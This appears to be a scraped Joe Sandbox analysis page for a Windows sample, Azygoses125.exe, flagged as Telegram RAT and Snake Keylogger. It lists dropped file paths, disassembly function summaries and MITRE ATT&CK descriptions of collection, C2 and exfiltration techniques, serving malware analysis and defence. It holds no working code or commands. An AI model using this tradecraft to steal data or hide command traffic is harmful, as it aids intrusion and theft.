Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Azygoses125.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gquzvnn.ato.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2jd0fbiz.2s1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jlqzkqo.0hp.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdtpj1ra.fo1.ps1

C:\Users\user\AppData\Local\Temp\nsd8E32.tmp

C:\Users\user\AppData\Local\Temp\nsq93A2.tmp\nsExec.dll

C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe

C:\Users\user\AppData\Local\magmaet\clenched\Azygoses125.exe:Zone.Identifier

C:\Users\user\AppData\Local\magmaet\clenched\Feltdefinition.Mej

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

C:\Users\user\AppData\Local\magmaet\clenched\Gascon.Som

Windows Analysis Report
Azygoses125.exe

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre